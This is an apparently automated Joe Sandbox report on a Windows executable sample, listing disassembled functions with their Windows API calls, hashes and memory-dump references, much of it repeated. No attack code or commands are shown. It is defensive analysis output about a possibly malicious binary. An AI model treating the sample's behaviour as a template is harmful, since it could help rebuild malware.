Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45

Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BE7
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9

Strings

Polystichoid, xrefs: 00401B9E, 00401BA4, 00401BBE

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Global$AllocFree
String ID: Polystichoid
API String ID: 3394109436-2603710711
Opcode ID: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
Opcode Fuzzy Hash: ee5f3472336f38c8d4c732810d3d94e3c99b64600326e0d47cef6cb5722a8e46
Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD

Function 00401F8C Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetFileVersionInfoSizeW.KERNELBASE(00000009,00000000,?,000000EE), ref: 00401FA2
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FC1

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 2520467145-0
Opcode ID: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
Instruction ID: 280eb5e8334f411f39d8c2fef6e633d2853c014e7ace8d4ea398df577ea4e561
Opcode Fuzzy Hash: a34a477b57b6b6384716236360418187d5a5464880f4ccde9889f209724b805d
Instruction Fuzzy Hash: A7114A71A00208BFDB01AFA5DD89E9EBBB5EF44314F11402AF505F62A1EB768951DB28

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
Instruction ID: c64e159aaddbf3301d14cafd97046592125c01172a1cc8aad3b5dad300b5ea2c
Opcode Fuzzy Hash: 872768f9574d12f43afb320518d05b11b882bfe6f7cb57a839f181c8ca2a28db
Instruction Fuzzy Hash: 2FF0FC32E041109BE700BBA49B8DABE72A49B44314F25003FFE02F31C1C9F84D41576D

Function 004053BF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004053CF

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

OleUninitialize.OLE32(00000404,00000000), ref: 0040541B

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 525bb05d90f4df8801b08e6467920f577611c358328cee9ceb5e9014414f017a
Instruction ID: 4b94bb8cc29b616b14fe2b60cd95aa592b1dcb8787795d26918334c9d59b584e
Opcode Fuzzy Hash: 525bb05d90f4df8801b08e6467920f577611c358328cee9ceb5e9014414f017a
Instruction Fuzzy Hash: 8AF09072600A10DBD31157549D01B6673A8EBD0345F55407FFF84A23E19B7648528B6E

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
Instruction ID: 5a19d233efad038c8b2c136f8d26bdd3a0ec8095e28a03ee1255231ebf4f6cbd
Opcode Fuzzy Hash: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
Instruction Fuzzy Hash: 35E04F36B10105ABCB24CBA4ED848AE77A5AB88310764057BE502B32A0CA75AD51CF78

Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D

Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98

Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
